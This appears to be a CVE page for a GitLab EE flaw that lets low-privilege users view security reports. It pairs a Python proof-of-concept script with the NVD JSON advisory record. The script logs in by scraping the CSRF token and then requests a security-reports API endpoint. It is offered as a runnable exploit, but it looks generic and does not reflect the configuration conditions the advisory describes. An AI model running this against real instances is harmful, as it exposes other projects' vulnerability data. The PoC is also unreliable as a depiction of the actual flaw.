CVE-2025-6195

# CVE-2025-6195 PoC - GitLab Security Report Information Disclosure # This PoC demonstrates accessing security reports as a low-privilege user import requests GITLAB_URL = "https://gitlab.example.com" PROJECT_ID = "your-project-id" USERNAME = "low-privilege-user" PASSWORD = "password" def login(): """Authenticate to GitLab and get session token""" session = requests.Session() login_url = f"{GITLAB_URL}/users/sign_in" response = session.get(login_url) # Extract authenticity token token = response.text.split('name="authenticity_token"')[1].split('value="')[1].split('"')[0] # Login login_data = { "authenticity_token": token, "user[login]": USERNAME, "user[password]": PASSWORD } session.post(login_url, data=login_data) return session def access_security_reports(session): """Attempt to access security reports as low-privilege user""" # Try to access security reports endpoint security_report_url = f"{GITLAB_URL}/api/v4/projects/{PROJECT_ID}/security/reports" response = session.get(security_report_url) if response.status_code == 200: print("[+] Successfully accessed security reports!") print(f"[+] Response: {response.json()}") return True else: print(f"[-] Access denied: {response.status_code}") return False if __name__ == "__main__": print("CVE-2025-6195 PoC - GitLab Security Report Information Disclosure") session = login() access_security_reports(session)

{"cve": {"id": "CVE-2025-6195", "sourceIdentifier": "[email protected]", "published": "2025-11-26T20:15:50.090", "lastModified": "2025-12-10T23:15:49.287", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 13.7 before 18.4.5, 18.5 before 18.5.3, and 18.6 before 18.6.1 that could have allowed an authenticated user to view information from security reports under certain configuration conditions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-425"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "13.7.0", "versionEndExcluding": "18.4.5", "matchCriteriaId": "8D33C1A9-DEAF-4651-B0B1-99C444EFA4C0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.3", "matchCriteriaId": "1B00EBAB-22CC-4350-AED2-60C7F78C0A8F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.6.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "200F0D66-67E2-4C9B-98C5-2F57FF5D7611"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/11/26/patch-release-gitlab-18-6-1-released/", "source": "[email protected]"}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/549937", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3155693", "source": "[email protected]", "tags": ["Permissions Required"]}]}}